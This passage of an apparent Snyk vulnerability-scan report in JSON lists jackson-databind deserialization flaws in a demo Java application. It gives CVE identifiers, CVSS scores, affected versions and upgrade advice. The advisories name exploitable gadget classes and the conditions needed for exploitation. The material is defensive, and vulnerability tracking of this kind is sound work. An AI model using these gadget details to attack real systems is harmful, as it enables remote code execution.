"functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2704", + "title": "Github Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.439153Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", + "epssDetails": { + "percentile": "0.93100", + "probability": "0.05308", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14062" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c265-37vj-cwcc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-05-29T15:36:30.302636Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-01T15:36:06Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-05-29T15:36:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.587184Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Al1ex@knownsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2765", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.171514Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", + "epssDetails": { + "percentile": "0.91500", + "probability": "0.03413", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14195" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mc6h-4qgp-37qh" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-14T14:48:40.820120Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-14T14:45:09Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-14T15:32:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.570033Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Topsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2688", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.405517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.94931", + "probability": "0.10105", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14060" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-j823-4qch-3rgm" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T10:29:46.691157Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:23:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:46:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.574354Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2698", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.989304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.91508", + "probability": "0.03404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14061" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c2q3-4qrh-fm48" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T11:03:46.232208Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:59:39Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:45:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.565244Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.009523Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: 